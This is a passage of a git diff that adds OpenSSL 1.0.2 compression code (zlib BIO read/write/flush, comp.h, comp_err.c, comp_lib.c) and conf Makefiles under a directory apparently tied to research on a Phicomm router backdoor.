+            return tot;
+        }
+        zin->avail_in = ret;
+        zin->next_in = ctx->ibuf;
+    }
+}
+
+static int bio_zlib_write(BIO *b, const char *in, int inl)
+{
+    BIO_ZLIB_CTX *ctx;
+    int ret;
+    z_stream *zout;
+    if (!in || !inl)
+        return 0;
+    ctx = (BIO_ZLIB_CTX *) b->ptr;
+    if (ctx->odone)
+        return 0;
+    zout = &ctx->zout;
+    BIO_clear_retry_flags(b);
+    if (!ctx->obuf) {
+        ctx->obuf = OPENSSL_malloc(ctx->obufsize);
+        /* Need error here */
+        if (!ctx->obuf) {
+            COMPerr(COMP_F_BIO_ZLIB_WRITE, ERR_R_MALLOC_FAILURE);
+            return 0;
+        }
+        ctx->optr = ctx->obuf;
+        ctx->ocount = 0;
+        deflateInit(zout, ctx->comp_level);
+        zout->next_out = ctx->obuf;
+        zout->avail_out = ctx->obufsize;
+    }
+    /* Obtain input data directly from supplied buffer */
+    zout->next_in = (void *)in;
+    zout->avail_in = inl;
+    for (;;) {
+        /* If data in output buffer write it first */
+        while (ctx->ocount) {
+            ret = BIO_write(b->next_bio, ctx->optr, ctx->ocount);
+            if (ret <= 0) {
+                /* Total data written */
+                int tot = inl - zout->avail_in;
+                BIO_copy_next_retry(b);
+                if (ret < 0)
+                    return (tot > 0) ? tot : ret;
+                return tot;
+            }
+            ctx->optr += ret;
+            ctx->ocount -= ret;
+        }
+
+        /* Have we consumed all supplied data? */
+        if (!zout->avail_in)
+            return inl;
+
+        /* Compress some more */
+
+        /* Reset buffer */
+        ctx->optr = ctx->obuf;
+        zout->next_out = ctx->obuf;
+        zout->avail_out = ctx->obufsize;
+        /* Compress some more */
+        ret = deflate(zout, 0);
+        if (ret != Z_OK) {
+            COMPerr(COMP_F_BIO_ZLIB_WRITE, COMP_R_ZLIB_DEFLATE_ERROR);
+            ERR_add_error_data(2, "zlib error:", zError(ret));
+            return 0;
+        }
+        ctx->ocount = ctx->obufsize - zout->avail_out;
+    }
+}
+
+static int bio_zlib_flush(BIO *b)
+{
+    BIO_ZLIB_CTX *ctx;
+    int ret;
+    z_stream *zout;
+    ctx = (BIO_ZLIB_CTX *) b->ptr;
+    /* If no data written or already flush show success */
+    if (!ctx->obuf || (ctx->odone && !ctx->ocount))
+        return 1;
+    zout = &ctx->zout;
+    BIO_clear_retry_flags(b);
+    /* No more input data */
+    zout->next_in = NULL;
+    zout->avail_in = 0;
+    for (;;) {
+        /* If data in output buffer write it first */
+        while (ctx->ocount) {
+            ret = BIO_write(b->next_bio, ctx->optr, ctx->ocount);
+            if (ret <= 0) {
+                BIO_copy_next_retry(b);
+                return ret;
+            }
+            ctx->optr += ret;
+            ctx->ocount -= ret;
+        }
+        if (ctx->odone)
+            return 1;
+
+        /* Compress some more */
+
+        /* Reset buffer */
+        ctx->optr = ctx->obuf;
+        zout->next_out = ctx->obuf;
+        zout->avail_out = ctx->obufsize;
+        /* Compress some more */
+        ret = deflate(zout, Z_FINISH);
+        if (ret == Z_STREAM_END)
+            ctx->odone = 1;
+        else if (ret != Z_OK) {
+            COMPerr(COMP_F_BIO_ZLIB_FLUSH, COMP_R_ZLIB_DEFLATE_ERROR);
+            ERR_add_error_data(2, "zlib error:", zError(ret));
+            return 0;
+        }
+        ctx->ocount = ctx->obufsize - zout->avail_out;
+    }
+}
+
+static long bio_zlib_ctrl(BIO *b, int cmd, long num, void *ptr)
+{
+    BIO_ZLIB_CTX *ctx;
+    int ret, *ip;
+    int ibs, obs;
+    if (!b->next_bio)
+        return 0;
+    ctx = (BIO_ZLIB_CTX *) b->ptr;
+    switch (cmd) {
+
+    case BIO_CTRL_RESET:
+        ctx->ocount = 0;
+        ctx->odone = 0;
+        ret = 1;
+        break;
+
+    case BIO_CTRL_FLUSH:
+        ret = bio_zlib_flush(b);
+        if (ret > 0)
+            ret = BIO_flush(b->next_bio);
+        break;
+
+    case BIO_C_SET_BUFF_SIZE:
+        ibs = -1;
+        obs = -1;
+        if (ptr != NULL) {
+            ip = ptr;
+            if (*ip == 0)
+                ibs = (int)num;
+            else
+                obs = (int)num;
+        } else {
+            ibs = (int)num;
+            obs = ibs;
+        }
+
+        if (ibs != -1) {
+            if (ctx->ibuf) {
+                OPENSSL_free(ctx->ibuf);
+                ctx->ibuf = NULL;
+            }
+            ctx->ibufsize = ibs;
+        }
+
+        if (obs != -1) {
+            if (ctx->obuf) {
+                OPENSSL_free(ctx->obuf);
+                ctx->obuf = NULL;
+            }
+            ctx->obufsize = obs;
+        }
+        ret = 1;
+        break;
+
+    case BIO_C_DO_STATE_MACHINE:
+        BIO_clear_retry_flags(b);
+        ret = BIO_ctrl(b->next_bio, cmd, num, ptr);
+        BIO_copy_next_retry(b);
+        break;
+
+    default:
+        ret = BIO_ctrl(b->next_bio, cmd, num, ptr);
+        break;
+
+    }
+
+    return ret;
+}
+
+static long bio_zlib_callback_ctrl(BIO *b, int cmd, bio_info_cb *fp)
+{
+    if (!b->next_bio)
+        return 0;
+    return BIO_callback_ctrl(b->next_bio, cmd, fp);
+}
+
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/comp/comp.h b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/comp/comp.h
new file mode 100644
index 0000000..406c428
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/comp/comp.h
@@ -0,0 +1,79 @@
+
+#ifndef HEADER_COMP_H
+# define HEADER_COMP_H
+
+# include <openssl/crypto.h>
+
+#ifdef  __cplusplus
+extern "C" {
+#endif
+
+typedef struct comp_ctx_st COMP_CTX;
+
+typedef struct comp_method_st {
+    int type;                   /* NID for compression library */
+    const char *name;           /* A text string to identify the library */
+    int (*init) (COMP_CTX *ctx);
+    void (*finish) (COMP_CTX *ctx);
+    int (*compress) (COMP_CTX *ctx,
+                     unsigned char *out, unsigned int olen,
+                     unsigned char *in, unsigned int ilen);
+    int (*expand) (COMP_CTX *ctx,
+                   unsigned char *out, unsigned int olen,
+                   unsigned char *in, unsigned int ilen);
+    /*
+     * The following two do NOTHING, but are kept for backward compatibility
+     */
+    long (*ctrl) (void);
+    long (*callback_ctrl) (void);
+} COMP_METHOD;
+
+struct comp_ctx_st {
+    COMP_METHOD *meth;
+    unsigned long compress_in;
+    unsigned long compress_out;
+    unsigned long expand_in;
+    unsigned long expand_out;
+    CRYPTO_EX_DATA ex_data;
+};
+
+COMP_CTX *COMP_CTX_new(COMP_METHOD *meth);
+void COMP_CTX_free(COMP_CTX *ctx);
+int COMP_compress_block(COMP_CTX *ctx, unsigned char *out, int olen,
+                        unsigned char *in, int ilen);
+int COMP_expand_block(COMP_CTX *ctx, unsigned char *out, int olen,
+                      unsigned char *in, int ilen);
+COMP_METHOD *COMP_rle(void);
+COMP_METHOD *COMP_zlib(void);
+void COMP_zlib_cleanup(void);
+
+# ifdef HEADER_BIO_H
+#  ifdef ZLIB
+BIO_METHOD *BIO_f_zlib(void);
+#  endif
+# endif
+
+/* BEGIN ERROR CODES */
+/*
+ * The following lines are auto generated by the script mkerr.pl. Any changes
+ * made after this point may be overwritten when the script is next run.
+ */
+void ERR_load_COMP_strings(void);
+
+/* Error codes for the COMP functions. */
+
+/* Function codes. */
+# define COMP_F_BIO_ZLIB_FLUSH                            99
+# define COMP_F_BIO_ZLIB_NEW                              100
+# define COMP_F_BIO_ZLIB_READ                             101
+# define COMP_F_BIO_ZLIB_WRITE                            102
+
+/* Reason codes. */
+# define COMP_R_ZLIB_DEFLATE_ERROR                        99
+# define COMP_R_ZLIB_INFLATE_ERROR                        100
+# define COMP_R_ZLIB_NOT_SUPPORTED                        101
+
+#ifdef  __cplusplus
+}
+#endif
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/comp/comp_err.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/comp/comp_err.c
new file mode 100644
index 0000000..8ca159b
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/comp/comp_err.c
@@ -0,0 +1,98 @@
+/* crypto/comp/comp_err.c */
+/* ====================================================================
+ * Copyright (c) 1999-2007 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    openssl-core@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+/*
+ * NOTE: this file was auto generated by the mkerr.pl script: any changes
+ * made to it will be overwritten when the script next updates this file,
+ * only reason strings will be preserved.
+ */
+
+#include <stdio.h>
+#include <openssl/err.h>
+#include <openssl/comp.h>
+
+/* BEGIN ERROR CODES */
+#ifndef OPENSSL_NO_ERR
+
+# define ERR_FUNC(func) ERR_PACK(ERR_LIB_COMP,func,0)
+# define ERR_REASON(reason) ERR_PACK(ERR_LIB_COMP,0,reason)
+
+static ERR_STRING_DATA COMP_str_functs[] = {
+    {ERR_FUNC(COMP_F_BIO_ZLIB_FLUSH), "BIO_ZLIB_FLUSH"},
+    {ERR_FUNC(COMP_F_BIO_ZLIB_NEW), "BIO_ZLIB_NEW"},
+    {ERR_FUNC(COMP_F_BIO_ZLIB_READ), "BIO_ZLIB_READ"},
+    {ERR_FUNC(COMP_F_BIO_ZLIB_WRITE), "BIO_ZLIB_WRITE"},
+    {0, NULL}
+};
+
+static ERR_STRING_DATA COMP_str_reasons[] = {
+    {ERR_REASON(COMP_R_ZLIB_DEFLATE_ERROR), "zlib deflate error"},
+    {ERR_REASON(COMP_R_ZLIB_INFLATE_ERROR), "zlib inflate error"},
+    {ERR_REASON(COMP_R_ZLIB_NOT_SUPPORTED), "zlib not supported"},
+    {0, NULL}
+};
+
+#endif
+
+void ERR_load_COMP_strings(void)
+{
+#ifndef OPENSSL_NO_ERR
+
+    if (ERR_func_error_string(COMP_str_functs[0].error) == NULL) {
+        ERR_load_strings(0, COMP_str_functs);
+        ERR_load_strings(0, COMP_str_reasons);
+    }
+#endif
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/comp/comp_lib.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/comp/comp_lib.c
new file mode 100644
index 0000000..bd4eb7a
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/comp/comp_lib.c
@@ -0,0 +1,66 @@
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <openssl/objects.h>
+#include <openssl/comp.h>
+
+COMP_CTX *COMP_CTX_new(COMP_METHOD *meth)
+{
+    COMP_CTX *ret;
+
+    if ((ret = (COMP_CTX *)OPENSSL_malloc(sizeof(COMP_CTX))) == NULL) {
+        /* ZZZZZZZZZZZZZZZZ */
+        return (NULL);
+    }
+    memset(ret, 0, sizeof(COMP_CTX));
+    ret->meth = meth;
+    if ((ret->meth->init != NULL) && !ret->meth->init(ret)) {
+        OPENSSL_free(ret);
+        ret = NULL;
+    }
+    return (ret);
+}
+
+void COMP_CTX_free(COMP_CTX *ctx)
+{
+    if (ctx == NULL)
+        return;
+
+    if (ctx->meth->finish != NULL)
+        ctx->meth->finish(ctx);
+
+    OPENSSL_free(ctx);
+}
+
+int COMP_compress_block(COMP_CTX *ctx, unsigned char *out, int olen,
+                        unsigned char *in, int ilen)
+{
+    int ret;
+    if (ctx->meth->compress == NULL) {
+        /* ZZZZZZZZZZZZZZZZZ */
+        return (-1);
+    }
+    ret = ctx->meth->compress(ctx, out, olen, in, ilen);
+    if (ret > 0) {
+        ctx->compress_in += ilen;
+        ctx->compress_out += ret;
+    }
+    return (ret);
+}
+
+int COMP_expand_block(COMP_CTX *ctx, unsigned char *out, int olen,
+                      unsigned char *in, int ilen)
+{
+    int ret;
+
+    if (ctx->meth->expand == NULL) {
+        /* ZZZZZZZZZZZZZZZZZ */
+        return (-1);
+    }
+    ret = ctx->meth->expand(ctx, out, olen, in, ilen);
+    if (ret > 0) {
+        ctx->expand_in += ilen;
+        ctx->expand_out += ret;
+    }
+    return (ret);
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/conf/Makefile b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/conf/Makefile
new file mode 100644
index 0000000..756f1f2
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/conf/Makefile
@@ -0,0 +1,146 @@
+#
+# OpenSSL/crypto/conf/Makefile
+#
+
+DIR=	conf
+TOP=	../..
+CC=	cc
+INCLUDES= -I.. -I$(TOP) -I../../include
+CFLAG=-g
+MAKEFILE=	Makefile
+AR=		ar r
+
+CFLAGS= $(INCLUDES) $(CFLAG)
+
+GENERAL=Makefile
+TEST=
+APPS=
+
+LIB=$(TOP)/libcrypto.a
+LIBSRC= conf_err.c conf_lib.c conf_api.c conf_def.c conf_mod.c \
+	 conf_mall.c conf_sap.c
+
+LIBOBJ=	conf_err.o conf_lib.o conf_api.o conf_def.o conf_mod.o \
+	conf_mall.o conf_sap.o
+
+SRC= $(LIBSRC)
+
+EXHEADER= conf.h conf_api.h
+HEADER=	conf_def.h $(EXHEADER)
+
+ALL=    $(GENERAL) $(SRC) $(HEADER)
+
+top:
+	(cd ../..; $(MAKE) DIRS=crypto SDIRS=$(DIR) sub_all)
+
+all:	lib
+
+lib:	$(LIBOBJ)
+	$(AR) $(LIB) $(LIBOBJ)
+	$(RANLIB) $(LIB) || echo Never mind.
+	@touch lib
+
+files:
+	$(PERL) $(TOP)/util/files.pl Makefile >> $(TOP)/MINFO
+
+links:
+	@$(PERL) $(TOP)/util/mklink.pl ../../include/openssl $(EXHEADER)
+	@$(PERL) $(TOP)/util/mklink.pl ../../test $(TEST)
+	@$(PERL) $(TOP)/util/mklink.pl ../../apps $(APPS)
+
+install:
+	@[ -n "$(INSTALLTOP)" ] # should be set by top Makefile...
+	@headerlist="$(EXHEADER)"; for i in $$headerlist ; \
+	do  \
+	(cp $$i $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i; \
+	chmod 644 $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i ); \
+	done;
+
+tags:
+	ctags $(SRC)
+
+tests:
+
+lint:
+	lint -DLINT $(INCLUDES) $(SRC)>fluff
+
+depend:
+	@[ -n "$(MAKEDEPEND)" ] # should be set by upper Makefile...
+	$(MAKEDEPEND) -- $(CFLAG) $(INCLUDES) $(DEPFLAG) -- $(LIBSRC)
+
+dclean:
+	$(PERL) -pe 'if (/^# DO NOT DELETE THIS LINE/) {print; exit(0);}' $(MAKEFILE) >Makefile.new
+	mv -f Makefile.new $(MAKEFILE)
+
+clean:
+	rm -f *.o *.obj lib tags core .pure .nfs* *.old *.bak fluff
+
+# DO NOT DELETE THIS LINE -- make depend depends on it.
+
+conf_api.o: ../../e_os.h ../../include/openssl/bio.h
+conf_api.o: ../../include/openssl/conf.h ../../include/openssl/conf_api.h
+conf_api.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+conf_api.o: ../../include/openssl/lhash.h ../../include/openssl/opensslconf.h
+conf_api.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+conf_api.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+conf_api.o: ../../include/openssl/symhacks.h conf_api.c
+conf_def.o: ../../e_os.h ../../include/openssl/bio.h
+conf_def.o: ../../include/openssl/buffer.h ../../include/openssl/conf.h
+conf_def.o: ../../include/openssl/conf_api.h ../../include/openssl/crypto.h
+conf_def.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+conf_def.o: ../../include/openssl/lhash.h ../../include/openssl/opensslconf.h
+conf_def.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+conf_def.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+conf_def.o: ../../include/openssl/symhacks.h ../cryptlib.h conf_def.c
+conf_def.o: conf_def.h
+conf_err.o: ../../include/openssl/bio.h ../../include/openssl/conf.h
+conf_err.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+conf_err.o: ../../include/openssl/err.h ../../include/openssl/lhash.h
+conf_err.o: ../../include/openssl/opensslconf.h
+conf_err.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+conf_err.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+conf_err.o: ../../include/openssl/symhacks.h conf_err.c
+conf_lib.o: ../../include/openssl/bio.h ../../include/openssl/conf.h
+conf_lib.o: ../../include/openssl/conf_api.h ../../include/openssl/crypto.h
+conf_lib.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+conf_lib.o: ../../include/openssl/lhash.h ../../include/openssl/opensslconf.h
+conf_lib.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+conf_lib.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+conf_lib.o: ../../include/openssl/symhacks.h conf_lib.c
+conf_mall.o: ../../e_os.h ../../include/openssl/asn1.h
+conf_mall.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+conf_mall.o: ../../include/openssl/conf.h ../../include/openssl/crypto.h
+conf_mall.o: ../../include/openssl/dso.h ../../include/openssl/e_os2.h
+conf_mall.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+conf_mall.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+conf_mall.o: ../../include/openssl/objects.h
+conf_mall.o: ../../include/openssl/opensslconf.h
+conf_mall.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+conf_mall.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+conf_mall.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+conf_mall.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+conf_mall.o: ../../include/openssl/x509_vfy.h ../cryptlib.h conf_mall.c
+conf_mod.o: ../../e_os.h ../../include/openssl/asn1.h
+conf_mod.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+conf_mod.o: ../../include/openssl/conf.h ../../include/openssl/crypto.h
+conf_mod.o: ../../include/openssl/dso.h ../../include/openssl/e_os2.h
+conf_mod.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+conf_mod.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+conf_mod.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+conf_mod.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+conf_mod.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+conf_mod.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+conf_mod.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+conf_mod.o: ../../include/openssl/x509_vfy.h ../cryptlib.h conf_mod.c
+conf_sap.o: ../../e_os.h ../../include/openssl/asn1.h
+conf_sap.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+conf_sap.o: ../../include/openssl/conf.h ../../include/openssl/crypto.h
+conf_sap.o: ../../include/openssl/dso.h ../../include/openssl/e_os2.h
+conf_sap.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+conf_sap.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+conf_sap.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+conf_sap.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+conf_sap.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+conf_sap.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+conf_sap.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+conf_sap.o: ../../include/openssl/x509_vfy.h ../cryptlib.h conf_sap.c
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/conf/Makefile.bak b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/conf/Makefile.bak
new file mode 100644
index 0000000..756f1f2
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/conf/Makefile.bak
@@ -0,0 +1,146 @@
+#
+# OpenSSL/crypto/conf/Makefile
+#
+
+DIR=	conf
+TOP=	../..
+CC=	cc
+INCLUDES= -I.. -I$(TOP) -I../../include
+CFLAG=-g
+MAKEFILE=	Makefile
+AR=		ar r
+
+CFLAGS= $(INCLUDES) $(CFLAG)
+
+GENERAL=Makefile
+TEST=
+APPS=
+
+LIB=$(TOP)/libcrypto.a
+LIBSRC= conf_err.c conf_lib.c conf_api.c conf_def.c conf_mod.c \
+	 conf_mall.c conf_sap.c
+
+LIBOBJ=	conf_err.o conf_lib.o conf_api.o conf_def.o conf_mod.o \
+	conf_mall.o conf_sap.o
+
+SRC= $(LIBSRC)
+
+EXHEADER= conf.h conf_api.h
+HEADER=	conf_def.h $(EXHEADER)
+
+ALL=    $(GENERAL) $(SRC) $(HEADER)
+
+top:
+	(cd ../..; $(MAKE) DIRS=crypto SDIRS=$(DIR) sub_all)
+
+all:	lib
+
+lib:	$(LIBOBJ)
+	$(AR) $(LIB) $(LIBOBJ)
+	$(RANLIB) $(LIB) || echo Never mind.
+	@touch lib
+
+files:
+	$(PERL) $(TOP)/util/files.pl Makefile >> $(TOP)/MINFO
+
+links:
+	@$(PERL) $(TOP)/util/mklink.pl ../../include/openssl $(EXHEADER)
+	@$(PERL) $(TOP)/util/mklink.pl ../../test $(TEST)
+	@$(PERL) $(TOP)/util/mklink.pl ../../apps $(APPS)
+
+install:
+	@[ -n "$(INSTALLTOP)" ] # should be set by top Makefile...
+	@headerlist="$(EXHEADER)"; for i in $$headerlist ; \
+	do  \
+	(cp $$i $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i; \
+	chmod 644 $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i ); \
+	done;
+
+tags:
+	ctags $(SRC)
+
+tests:
+
+lint:
+	lint -DLINT $(INCLUDES) $(SRC)>fluff
+
+depend:
+	@[ -n "$(MAKEDEPEND)" ] # should be set by upper Makefile...
+	$(MAKEDEPEND) -- $(CFLAG) $(INCLUDES) $(DEPFLAG) -- $(LIBSRC)
+
+dclean:
+	$(PERL) -pe 'if (/^# DO NOT DELETE THIS LINE/) {print; exit(0);}' $(MAKEFILE) >Makefile.new
+	mv -f Makefile.new $(MAKEFILE)
+
+clean:
+	rm -f *.o *.obj lib tags core .pure .nfs* *.old *.bak fluff
+
+# DO NOT DELETE THIS LINE -- make depend depends on it.
+
+conf_api.o: ../../e_os.h ../../include/openssl/bio.h
+conf_api.o: ../../include/openssl/conf.h ../../include/openssl/conf_api.h
+conf_api.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+conf_api.o: ../../include/openssl/lhash.h ../../include/openssl/opensslconf.h
+conf_api.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+conf_api.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+conf_api.o: ../../include/openssl/symhacks.h conf_api.c
+conf_def.o: ../../e_os.h ../../include/openssl/bio.h
+conf_def.o: ../../include/openssl/buffer.h ../../include/openssl/conf.h
+conf_def.o: ../../include/openssl/conf_api.h ../../include/openssl/crypto.h
+conf_def.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+conf_def.o: ../../include/openssl/lhash.h ../../include/openssl/opensslconf.h
+conf_def.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+conf_def.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+conf_def.o: ../../include/openssl/symhacks.h ../cryptlib.h conf_def.c
+conf_def.o: conf_def.h
+conf_err.o: ../../include/openssl/bio.h ../../include/openssl/conf.h
+conf_err.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+conf_err.o: ../../include/openssl/err.h ../../include/openssl/lhash.h
+conf_err.o: ../../include/openssl/opensslconf.h
+conf_err.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+conf_err.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+conf_err.o: ../../include/openssl/symhacks.h conf_err.c
+conf_lib.o: ../../include/openssl/bio.h ../../include/openssl/conf.h
+conf_lib.o: ../../include/openssl/conf_api.h ../../include/openssl/crypto.h
+conf_lib.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+conf_lib.o: ../../include/openssl/lhash.h ../../include/openssl/opensslconf.h
+conf_lib.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+conf_lib.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+conf_lib.o: ../../include/openssl/symhacks.h conf_lib.c
+conf_mall.o: ../../e_os.h ../../include/openssl/asn1.h
+conf_mall.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+conf_mall.o: ../../include/openssl/conf.h ../../include/openssl/crypto.h
+conf_mall.o: ../../include/openssl/dso.h ../../include/openssl/e_os2.h
+conf_mall.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+conf_mall.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+conf_mall.o: ../../include/openssl/objects.h
+conf_mall.o: ../../include/openssl/opensslconf.h
+conf_mall.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+conf_mall.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+conf_mall.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+conf_mall.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+conf_mall.o: ../../include/openssl/x509_vfy.h ../cryptlib.h conf_mall.c
+conf_mod.o: ../../e_os.h ../../include/openssl/asn1.h
+conf_mod.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+conf_mod.o: ../../include/openssl/conf.h ../../include/openssl/crypto.h
+conf_mod.o: ../../include/openssl/dso.h ../../include/openssl/e_os2.h
+conf_mod.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+conf_mod.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+conf_mod.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+conf_mod.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+conf_mod.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+conf_mod.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+conf_mod.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+conf_mod.o: ../../include/openssl/x509_vfy.h ../cryptlib.h conf_mod.c
+conf_sap.o: ../../e_os.h ../../include/openssl/asn1.h
+conf_sap.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+conf_sap.o: ../../include/openssl/conf.h ../../include/openssl/crypto.h
+conf_sap.o: ../../include/openssl/dso.h ../../include/openssl/e_os2.h
+conf_sap.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+conf_sap.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+conf_sap.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+conf_sap.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+conf_sap.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+conf_sap.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+conf_sap.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+conf_sap.o: ../../include/openssl/x509_vfy.h ../cryptlib.h conf_sap.c
